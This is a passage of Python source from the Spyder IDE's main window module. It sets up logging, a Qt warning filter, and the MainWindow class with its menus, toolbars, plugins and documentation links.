QQuickWindow.setSceneGraphBackend(QSGRendererInterface.Software)
elif option == 'desktop':
QCoreApplication.setAttribute(Qt.AA_UseDesktopOpenGL)
if QQuickWindow is not None:
QQuickWindow.setSceneGraphBackend(QSGRendererInterface.OpenGL)
elif option == 'gles':
QCoreApplication.setAttribute(Qt.AA_UseOpenGLES)
if QQuickWindow is not None:
QQuickWindow.setSceneGraphBackend(QSGRendererInterface.OpenGL)
def setup_logging(cli_options):
"""Setup logging with cli options defined by the user."""
if cli_options.debug_info or get_debug_level() > 0:
levels = {2: logging.INFO, 3: logging.DEBUG}
log_level = levels[get_debug_level()]
log_format = '%(asctime)s [%(levelname)s] [%(name)s] -> %(message)s'
if cli_options.debug_output == 'file':
log_file = 'spyder-debug.log'
else:
log_file = None
logging.basicConfig(level=log_level,
format=log_format,
filename=log_file,
filemode='w+')
def qt_message_handler(msg_type, msg_log_context, msg_string):
"""
Qt warning messages are intercepted by this handler.
On some operating systems, warning messages might be displayed
even if the actual message does not apply. This filter adds a
blacklist for messages that are being printed for no apparent
reason. Anything else will get printed in the internal console.
In DEV mode, all messages are printed.
"""
BLACKLIST = [
'QMainWidget::resizeDocks: all sizes need to be larger than 0',
]
if DEV or msg_string not in BLACKLIST:
print(msg_string) # spyder: test-skip
qInstallMessageHandler(qt_message_handler)
# =============================================================================
# Dependencies
# =============================================================================
QDARKSTYLE_REQVER = '>=2.6.4'
dependencies.add("qdarkstyle", _("Dark style for the entire interface"),
required_version=QDARKSTYLE_REQVER)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = QMainWindow.AllowTabbedDocks|QMainWindow.AllowNestedDocks
CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
BOOKMARKS = (
('Python2', "https://docs.python.org/2/index.html",
_("Python2 documentation")),
('Python3', "https://docs.python.org/3/index.html",
_("Python3 documentation")),
('numpy', "https://docs.scipy.org/doc/",
_("Numpy and Scipy documentation")),
('matplotlib', "https://matplotlib.org/contents.html",
_("Matplotlib documentation")),
('PyQt5',
"http://pyqt.sourceforge.net/Docs/PyQt5/",
_("PyQt5 Reference Guide")),
('PyQt5',
"http://pyqt.sourceforge.net/Docs/PyQt5/class_reference.html",
_("PyQt5 API Reference")),
('winpython', "https://winpython.github.io/",
_("WinPython"))
)
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
all_actions_defined = Signal()
sig_pythonpath_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # Related to interactive tour
sig_moved = Signal("QMoveEvent") # Related to interactive tour
sig_layout_setup_ready = Signal(object) # Related to default layouts
def __init__(self, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if PYQT5:
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.dialog_manager = DialogManager()
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
self.open_project = options.project
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make spyder quit when presing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Loading Spyder path
self.path = []
self.not_active_path = []
self.project_path = []
if osp.isfile(self.SPYDER_PATH):
self.path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = [name for name in self.path if osp.isdir(name)]
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
self.not_active_path, _x = \
encoding.readlines(self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = \
[name for name in self.not_active_path if osp.isdir(name)]
self.remove_path_from_sys_path()
self.add_path_to_sys_path()
# Plugins
self.console = None
self.workingdirectory = None
self.editor = None
self.explorer = None
self.help = None
self.onlinehelp = None
self.projects = None
self.outlineexplorer = None
self.historylog = None
self.ipyconsole = None
self.variableexplorer = None
self.plots = None
self.findinfiles = None
self.thirdparty_plugins = []
# Tour # TODO: Should I consider it a plugin?? or?
self.tour = None
self.tours_available = None
# File switcher
self.fileswitcher = None
# Check for updates Thread and Worker, refereces needed to prevent
# segfaulting
self.check_updates_action = None
self.thread_updates = None
self.worker_updates = None
self.give_updates_feedback = True
# Preferences
from spyder.preferences.appearance import AppearanceConfigPage
from spyder.preferences.general import MainConfigPage
from spyder.preferences.shortcuts import ShortcutsConfigPage
from spyder.preferences.runconfig import RunConfigPage
from spyder.preferences.maininterpreter import MainInterpreterConfigPage
from spyder.preferences.languageserver import LSPManagerConfigPage
self.general_prefs = [MainConfigPage, AppearanceConfigPage,
ShortcutsConfigPage, MainInterpreterConfigPage,
RunConfigPage, LSPManagerConfigPage]
self.prefs_index = None
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Quick Layouts and Dialogs
from spyder.preferences.layoutdialog import (LayoutSaveDialog,
LayoutSettingsDialog)
self.dialog_layout_save = LayoutSaveDialog
self.dialog_layout_settings = LayoutSettingsDialog
# Actions
self.lock_interface_action = None
self.show_toolbars_action = None
self.close_dockwidget_action = None
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
self.maximize_action = None
self.fullscreen_action = None
# Menu bars
self.file_menu = None
self.file_menu_actions = []
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
self.tools_menu = None
self.tools_menu_actions = []
self.external_tools_menu = None # We must keep a reference to this,
# otherwise the external tools menu is lost after leaving setup method
self.external_tools_menu_actions = []
self.view_menu = None
self.plugins_menu = None
self.plugins_menu_actions = []
self.toolbars_menu = None
self.help_menu = None
self.help_menu_actions = []
# Status bar widgets
self.mem_status = None
self.cpu_status = None
# Toolbars
self.visible_toolbars = []
self.toolbarslist = []
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.edit_toolbar = None
self.edit_toolbar_actions = []
self.search_toolbar = None
self.search_toolbar_actions = []
self.source_toolbar = None
self.source_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.layout_toolbar = None
self.layout_toolbar_actions = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
# Set window title
self.set_window_title()
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_travis = os.environ.get('TEST_CI_APP', None)
if test_travis is not None:
global MAIN_APP
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(MAIN_APP.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = SPLASH
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.interface_locked = CONF.get('main', 'panes_locked')
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
self.state_before_maximizing = None
self.current_quick_layout = None
self.previous_layout_settings = None # TODO: related to quick layouts
self.last_plugin = None
self.fullscreen_flag = None # isFullscreen does not work as expected
# The following flag remember the maximized state even when
# the window is in fullscreen mode:
self.maximized_flag = None
# The following flag is used to restore window's geometry when
# toggling out of fullscreen mode in Windows.
self.saved_normal_geometry = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See issue 4132
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError as e:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: #555555\'><b>netsh winsock reset"
"</b></span><br>"))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# Apply preferences
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
#---- Window setup
def create_toolbar(self, title, object_name, iconsize=24):
"""Create and return toolbar with *title* and *object_name*"""
toolbar = self.addToolBar(title)
toolbar.setObjectName(object_name)
toolbar.setIconSize(QSize(iconsize, iconsize))
self.toolbarslist.append(toolbar)
return toolbar
def setup(self):
"""Setup main window"""
logger.info("*** Start of MainWindow setup ***")
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
dark_qss = qdarkstyle.load_stylesheet_from_environment()
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
dark_qss = qdarkstyle.load_stylesheet_from_environment()
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
css_path = CSS_PATH
else:
css_path = CSS_PATH
logger.info("Creating core actions...")
self.close_dockwidget_action = create_action(
self, icon=ima.icon('close_pane'),
text=_("Close current pane"),
triggered=self.close_current_dockwidget,
context=Qt.ApplicationShortcut
)
self.register_shortcut(self.close_dockwidget_action, "_",
"Close pane")
self.lock_interface_action = create_action(
self,
_("Lock panes and toolbars"),
toggled=self.toggle_lock,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.lock_interface_action, "_",
"Lock unlock panes")
# custom layouts shortcuts
self.toggle_next_layout_action = create_action(self,
_("Use next layout"),
triggered=self.toggle_next_layout,
context=Qt.ApplicationShortcut)
self.toggle_previous_layout_action = create_action(self,
_("Use previous layout"),
triggered=self.toggle_previous_layout,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.toggle_next_layout_action, "_",
"Use next layout")
self.register_shortcut(self.toggle_previous_layout_action, "_",
"Use previous layout")
# File switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_fileswitcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_sc_to_tip=True)
self.file_toolbar_actions = [self.file_switcher_action,
self.symbol_finder_action]
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
namespace = None
logger.info("Creating toolbars...")
# File menu/toolbar
self.file_menu = self.menuBar().addMenu(_("&File"))
self.file_toolbar = self.create_toolbar(_("File toolbar"),
"file_toolbar")
# Edit menu/toolbar
self.edit_menu = self.menuBar().addMenu(_("&Edit"))
self.edit_toolbar = self.create_toolbar(_("Edit toolbar"),
"edit_toolbar")
# Search menu/toolbar
self.search_menu = self.menuBar().addMenu(_("&Search"))
self.search_toolbar = self.create_toolbar(_("Search toolbar"),
"search_toolbar")
# Source menu/toolbar
self.source_menu = self.menuBar().addMenu(_("Sour&ce"))
self.source_toolbar = self.create_toolbar(_("Source toolbar"),
"source_toolbar")
# Run menu/toolbar
self.run_menu = self.menuBar().addMenu(_("&Run"))
self.run_toolbar = self.create_toolbar(_("Run toolbar"),
"run_toolbar")
# Debug menu/toolbar
self.debug_menu = self.menuBar().addMenu(_("&Debug"))
self.debug_toolbar = self.create_toolbar(_("Debug toolbar"),
"debug_toolbar")
# Consoles menu/toolbar
self.consoles_menu = self.menuBar().addMenu(_("C&onsoles"))
self.consoles_menu.aboutToShow.connect(
self.update_execution_state_kernel)
# Projects menu
self.projects_menu = self.menuBar().addMenu(_("&Projects"))
self.projects_menu.aboutToShow.connect(self.valid_project)
# Tools menu
self.tools_menu = self.menuBar().addMenu(_("&Tools"))
# View menu
self.view_menu = self.menuBar().addMenu(_("&View"))
# Help menu
self.help_menu = self.menuBar().addMenu(_("&Help"))
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
logger.info("Creating Tools menu...")
# Tools + External Tools
prefs_action = create_action(self, _("Pre&ferences"),
icon=ima.icon('configure'),
triggered=self.edit_preferences,
context=Qt.ApplicationShortcut)
self.register_shortcut(prefs_action, "_", "Preferences",
add_sc_to_tip=True)
spyder_path_action = create_action(self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.path_manager_callback,
tip=_("Python Path Manager"),
menurole=QAction.ApplicationSpecificRole)
reset_spyder_action = create_action(
self, _("Reset Spyder to factory defaults"),
triggered=self.reset_spyder)
self.tools_menu_actions = [prefs_action, spyder_path_action]
if WinUserEnvDialog is not None:
winenv_action = create_action(self,
_("Current user environment variables..."),
icon='win_env.png',
tip=_("Show and edit current user environment "
"variables in Windows registry "
"(i.e. for all sessions)"),
triggered=self.win_env)
self.tools_menu_actions.append(winenv_action)
self.tools_menu_actions += [MENU_SEPARATOR, reset_spyder_action]
# External Tools submenu
self.external_tools_menu = QMenu(_("External Tools"))
self.external_tools_menu_actions = []
# WinPython control panel
self.wp_action = create_action(self, _("WinPython control panel"),
icon=get_icon('winpython.svg'),
triggered=lambda:
programs.run_python_script('winpython', 'controlpanel'))
if os.name == 'nt' and is_module_installed('winpython'):
self.external_tools_menu_actions.append(self.wp_action)
# Qt-related tools
additact = []
for name in ("designer-qt4", "designer"):
qtdact = create_program_action(self, _("Qt Designer"), name)
if qtdact:
break
for name in ("linguist-qt4", "linguist"):
qtlact = create_program_action(self, _("Qt Linguist"), "linguist")
if qtlact:
break
args = ['-no-opengl'] if os.name == 'nt' else []
for act in (qtdact, qtlact):
if act:
additact.append(act)
if additact and is_module_installed('winpython'):
self.external_tools_menu_actions += [None] + additact
# Guidata and Sift
logger.info("Creating guidata and sift entries...")
gdgq_act = []
# Guidata and Guiqwt don't support PyQt5 yet and they fail
# with an AssertionError when imported using those bindings
# (see issue 2274)
try:
from guidata import configtools
from guidata import config # analysis:ignore
guidata_icon = configtools.get_icon('guidata.svg')
guidata_act = create_python_script_action(self,
_("guidata examples"), guidata_icon,
"guidata",
osp.join("tests", "__init__"))
gdgq_act += [guidata_act]
except:
pass
try:
from guidata import configtools
from guiqwt import config # analysis:ignore
guiqwt_icon = configtools.get_icon('guiqwt.svg')
guiqwt_act = create_python_script_action(self,
_("guiqwt examples"), guiqwt_icon, "guiqwt",
osp.join("tests", "__init__"))
if guiqwt_act:
gdgq_act += [guiqwt_act]
sift_icon = configtools.get_icon('sift.svg')
sift_act = create_python_script_action(self, _("Sift"),
sift_icon, "guiqwt", osp.join("tests", "sift"))
if sift_act:
gdgq_act += [sift_act]
except:
pass
if gdgq_act:
self.external_tools_menu_actions += [None] + gdgq_act
# Maximize current plugin
self.maximize_action = create_action(self, '',
triggered=self.maximize_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.maximize_action, "_", "Maximize pane")
self.__update_maximize_action()
# Fullscreen mode
self.fullscreen_action = create_action(self,
_("Fullscreen mode"),
triggered=self.toggle_fullscreen,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.fullscreen_action, "_",
"Fullscreen mode", add_sc_to_tip=True)
# Main toolbar
self.main_toolbar_actions = [self.maximize_action,
self.fullscreen_action,
None,
prefs_action, spyder_path_action]
self.main_toolbar = self.create_toolbar(_("Main toolbar"),
"main_toolbar")
# Internal console plugin
logger.info("Loading internal console...")
from spyder.plugins.console.plugin import Console
self.console = Console(self, namespace, exitfunc=self.closing,
profile=self.profile,
multithreaded=self.multithreaded,
message=_("Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"))
self.console.register_plugin()
# Language Server Protocol Client initialization
self.set_splash(_("Starting Language Server Protocol manager..."))
from spyder.plugins.editor.lsp.manager import LSPManager
self.lspmanager = LSPManager(self)
# Working directory plugin
logger.info("Loading working directory...")
from spyder.plugins.workingdirectory.plugin import WorkingDirectory
self.workingdirectory = WorkingDirectory(self, self.init_workdir, main=self)
self.workingdirectory.register_plugin()
self.toolbarslist.append(self.workingdirectory.toolbar)
# Help plugin
if CONF.get('help', 'enable'):
self.set_splash(_("Loading help..."))
from spyder.plugins.help.plugin import Help
self.help = Help(self, css_path=css_path)
self.help.register_plugin()
# Outline explorer widget
if CONF.get('outline_explorer', 'enable'):
self.set_splash(_("Loading outline explorer..."))
from spyder.plugins.outlineexplorer.plugin import OutlineExplorer
self.outlineexplorer = OutlineExplorer(self)
self.outlineexplorer.register_plugin()
# Editor plugin
self.set_splash(_("Loading editor..."))
from spyder.plugins.editor.plugin import Editor
self.editor = Editor(self)
self.editor.register_plugin()
# Start LSP client
self.set_splash(_("Launching LSP Client for Python..."))
self.lspmanager.start_client(language='python')
# Populating file menu entries
quit_action = create_action(self, _("&Quit"),
icon=ima.icon('exit'),
tip=_("Quit"),
triggered=self.console.quit,
context=Qt.ApplicationShortcut)
self.register_shortcut(quit_action, "_", "Quit")
restart_action = create_action(self, _("&Restart"),
icon=ima.icon('restart'),
tip=_("Restart"),
triggered=self.restart,
context=Qt.ApplicationShortcut)
self.register_shortcut(restart_action, "_", "Restart")
self.file_menu_actions += [self.file_switcher_action,
self.symbol_finder_action, None,
restart_action, quit_action]
self.set_splash("")
# Namespace browser
self.set_splash(_("Loading namespace browser..."))
from spyder.plugins.variableexplorer.plugin import VariableExplorer
self.variableexplorer = VariableExplorer(self)
self.variableexplorer.register_plugin()
# Figure browser
self.set_splash(_("Loading figure browser..."))
from spyder.plugins.plots.plugin import Plots
self.plots = Plots(self)
self.plots.register_plugin()
# History log widget
if CONF.get('historylog', 'enable'):
self.set_splash(_("Loading history plugin..."))
from spyder.plugins.history.plugin import HistoryLog
self.historylog = HistoryLog(self)
self.historylog.register_plugin()
# IPython console
self.set_splash(_("Loading IPython console..."))
from spyder.plugins.ipythonconsole.plugin import IPythonConsole
self.ipyconsole = IPythonConsole(self, css_path=css_path)
self.ipyconsole.register_plugin()
# Explorer
if CONF.get('explorer', 'enable'):
self.set_splash(_("Loading file explorer..."))
from spyder.plugins.explorer.plugin import Explorer
self.explorer = Explorer(self)
self.explorer.register_plugin()
# Online help widget
try: # Qt >= v4.4
from spyder.plugins.onlinehelp.plugin import OnlineHelp
except ImportError: # Qt < v4.4
OnlineHelp = None # analysis:ignore
if CONF.get('onlinehelp', 'enable') and OnlineHelp is not None:
self.set_splash(_("Loading online help..."))
self.onlinehelp = OnlineHelp(self)
self.onlinehelp.register_plugin()
# Project explorer widget
self.set_splash(_("Loading project explorer..."))
from spyder.plugins.projects.plugin import Projects
self.projects = Projects(self)
self.projects.register_plugin()
self.project_path = self.projects.get_pythonpath(at_start=True)
# Find in files
if CONF.get('find_in_files', 'enable'):
from spyder.plugins.findinfiles.plugin import FindInFiles
self.findinfiles = FindInFiles(self)
self.findinfiles.register_plugin()
# Load other plugins (former external plugins)
# TODO: Use this bucle to load all internall plugins and remove
# duplicated code
other_plugins = ['breakpoints', 'profiler', 'pylint']
for plugin_name in other_plugins:
if CONF.get(plugin_name, 'enable'):
module = importlib.import_module(
'spyder.plugins.{}'.format(plugin_name))
plugin = module.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
# Third-party plugins
self.set_splash(_("Loading third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Setting up main window..."))
# Help menu
trouble_action = create_action(self,
_("Troubleshooting..."),
triggered=self.trouble_guide)
dep_action = create_action(self, _("Dependencies..."),
triggered=self.show_dependencies,
icon=ima.icon('advanced'))
report_action = create_action(self,
_("Report issue..."),
icon=ima.icon('bug'),
triggered=self.report_issue)
support_action = create_action(self,
_("Spyder support..."),
triggered=self.google_group)
self.check_updates_action = create_action(self,
_("Check for updates..."),
triggered=self.check_updates)
# Spyder documentation
spyder_doc = 'https://docs.spyder-ide.org/'
doc_action = create_action(self, _("Spyder documentation"),
icon=ima.icon('DialogHelpButton'),
triggered=lambda:
programs.start_file(spyder_doc))
self.register_shortcut(doc_action, "_",
"spyder documentation")
if self.help is not None:
tut_action = create_action(self, _("Spyder tutorial"),
triggered=self.help.show_tutorial)
else:
tut_action = None
shortcuts_action = create_action(self, _("Shortcuts Summary"),
shortcut="Meta+F1",
triggered=self.show_shortcuts_dialog)
#----- Tours
self.tour = tour.AnimatedTour(self)
self.tours_menu = QMenu(_("Interactive tours"), self)
self.tour_menu_actions = []
# TODO: Only show intro tour for now. When we are close to finish
# 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(0)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
def trigger(i=i, self=self): # closure needed!
return lambda: self.show_tour(i)
temp_action = create_action(self, tour_name, tip="",
triggered=trigger())
self.tour_menu_actions += [temp_action]
self.tours_menu.addActions(self.tour_menu_actions)
self.help_menu_actions = [doc_action, tut_action, shortcuts_action,
self.tours_menu,
MENU_SEPARATOR, trouble_action,
report_action, dep_action,
self.check_updates_action, support_action,
MENU_SEPARATOR]
# Python documentation
if get_python_doc_path() is not None:
pydoc_act = create_action(self, _("Python documentation"),
triggered=lambda:
programs.start_file(get_python_doc_path()))
self.help_menu_actions.append(pydoc_act)
# IPython documentation
if self.help is not None:
ipython_menu = QMenu(_("IPython documentation"), self)
intro_action = create_action(self, _("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(self, _("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(self, _("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(ipython_menu, (intro_action, guiref_action,
quickref_action))
self.help_menu_actions.append(ipython_menu)
# Windows-only: documentation located in sys.prefix/Doc
ipm_actions = []
def add_ipm_action(text, path):
"""Add installed Python module doc action to help submenu"""
# QAction.triggered works differently for PySide and PyQt
path = file_uri(path)
if not API == 'pyside':
slot=lambda _checked, path=path: programs.start_file(path)
else:
slot=lambda path=path: programs.start_file(path)
action = create_action(self, text,
icon='%s.png' % osp.splitext(path)[1][1:],
triggered=slot)
ipm_actions.append(action)
sysdocpth = osp.join(sys.prefix, 'Doc')
if osp.isdir(sysdocpth): # exists on Windows, except frozen dist.
for docfn in os.listdir(sysdocpth):
pt = r'([a-zA-Z\_]*)(doc)?(-dev)?(-ref)?(-user)?.(chm|pdf)'
match = re.match(pt, docfn)
if match is not None:
pname = match.groups()[0]
if pname not in ('Python', ):
add_ipm_action(pname, osp.join(sysdocpth, docfn))
# Installed Python modules submenu (Windows only)
if ipm_actions:
pymods_menu = QMenu(_("Installed Python modules"), self)
add_actions(pymods_menu, ipm_actions)
self.help_menu_actions.append(pymods_menu)
# Online documentation
web_resources = QMenu(_("Online documentation"), self)
webres_actions = create_module_bookmark_actions(self,
self.BOOKMARKS)
webres_actions.insert(2, None)
webres_actions.insert(5, None)
webres_actions.insert(8, None)
add_actions(web_resources, webres_actions)
self.help_menu_actions.append(web_resources)
# Qt assistant link
if sys.platform.startswith('linux') and not PYQT5:
qta_exe = "assistant-qt4"
else:
qta_exe = "assistant"
qta_act = create_program_action(self, _("Qt documentation"),
qta_exe)
if qta_act:
self.help_menu_actions += [qta_act, None]
# About Spyder
about_action = create_action(self,
_("About %s...") % "Spyder",
icon=ima.icon('MessageBoxInformation'),
triggered=self.about)
self.help_menu_actions += [MENU_SEPARATOR, about_action]
# Status bar widgets
from spyder.widgets.status import MemoryStatus, CPUStatus
self.mem_status = MemoryStatus(self, status)
self.cpu_status = CPUStatus(self, status)
self.apply_statusbar_settings()
# ----- View
# View menu
self.plugins_menu = QMenu(_("Panes"), self)
self.toolbars_menu = QMenu(_("Toolbars"), self)
self.quick_layout_menu = QMenu(_("Window layouts"), self)
self.quick_layout_set_menu()
self.view_menu.addMenu(self.plugins_menu) # Panes
add_actions(self.view_menu, (self.lock_interface_action,
self.close_dockwidget_action,
self.maximize_action,
MENU_SEPARATOR))
self.show_toolbars_action = create_action(self,
_("Show toolbars"),
triggered=self.show_toolbars,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.show_toolbars_action, "_",
"Show toolbars")
self.view_menu.addMenu(self.toolbars_menu)
self.view_menu.addAction(self.show_toolbars_action)
add_actions(self.view_menu, (MENU_SEPARATOR,
self.quick_layout_menu,
self.toggle_previous_layout_action,
self.toggle_next_layout_action,
MENU_SEPARATOR,
self.fullscreen_action))
if set_attached_console_visible is not None:
cmd_act = create_action(self,
_("Attached console window (debugging)"),
toggled=set_attached_console_visible)
cmd_act.setChecked(is_attached_console_visible())
add_actions(self.view_menu, (MENU_SEPARATOR, cmd_act))
# Adding external tools action to "Tools" menu
if self.external_tools_menu_actions:
external_tools_act = create_action(self, _("External Tools"))
external_tools_act.setMenu(self.external_tools_menu)
self.tools_menu_actions += [None, external_tools_act]
# Filling out menu/toolbar entries:
add_actions(self.file_menu, self.file_menu_actions)
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
add_actions(self.tools_menu, self.tools_menu_actions)
add_actions(self.external_tools_menu,
self.external_tools_menu_actions)
add_actions(self.help_menu, self.help_menu_actions)
add_actions(self.main_toolbar, self.main_toolbar_actions)
add_actions(self.file_toolbar, self.file_toolbar_actions)
add_actions(self.edit_toolbar, self.edit_toolbar_actions)
add_actions(self.search_toolbar, self.search_toolbar_actions)
add_actions(self.source_toolbar, self.source_toolbar_actions)
add_actions(self.debug_toolbar, self.debug_toolbar_actions)
add_actions(self.run_toolbar, self.run_toolbar_actions)
# Apply all defined shortcuts (plugins + 3rd-party plugins)
self.apply_shortcuts()
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
# Window set-up
logger.info("Setting up window...")
self.setup_layout(default=False)
# Show and hide shortcuts in menus for Mac.
# This is a workaround because we can't disable shortcuts
# by setting context=Qt.WidgetShortcut there
if sys.platform == 'darwin':
for name in ['file', 'edit', 'search', 'source', 'run', 'debug',
'projects', 'tools', 'plugins']:
menu_object = getattr(self, name + '_menu')
menu_object.aboutToShow.connect(
lambda name=name: self.show_shortcuts(name))
menu_object.aboutToHide.connect(
lambda name=name: self.hide_shortcuts(name))
if self.splash is not None:
self.splash.hide()
# Enabling tear off for all menus except help menu
if CONF.get('main', 'tear_off_menus'):
for child in self.menuBar().children():
if isinstance(child, QMenu) and child != self.help_menu:
child.setTearOffEnabled(True)
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
self.restore_scrollbar_position.emit()
# [Workaround for Issue 880]
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
